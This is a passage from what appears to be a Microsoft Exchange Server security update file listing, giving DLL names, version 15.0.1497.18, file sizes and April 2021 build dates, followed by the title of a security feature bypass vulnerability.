\nMicrosoft.exchange.storeprovider.dll| 15.0.1497.18| 998,376| 27-Apr-21| 8:55| x86 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.0.1497.18| 15,832| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.textprocessing.dll| 15.0.1497.18| 151,472| 27-Apr-21| 8:58| x86 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.0.1497.18| 24,576| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.0.1497.18| 96,256| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.0.1497.18| 22,536| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.0.1497.18| 20,480| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.0.1497.18| 217,104| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.0.1497.18| 103,936| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.0.1497.18| 17,920| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.0.1497.18| 133,088| 27-Apr-21| 8:59| x86 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.0.1497.18| 21,504| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.0.1497.18| 29,704| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.0.1497.18| 48,128| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.0.1497.18| 30,208| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.0.1497.18| 54,280| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.0.1497.18| 28,632| 27-Apr-21| 9:48| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.0.1497.18| 17,920| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.0.1497.18| 45,072| 27-Apr-21| 8:56| x86 \nMicrosoft.exchange.transport.common.dll| 15.0.
Microsoft Exchange Server Security Feature Bypass Vulnerability
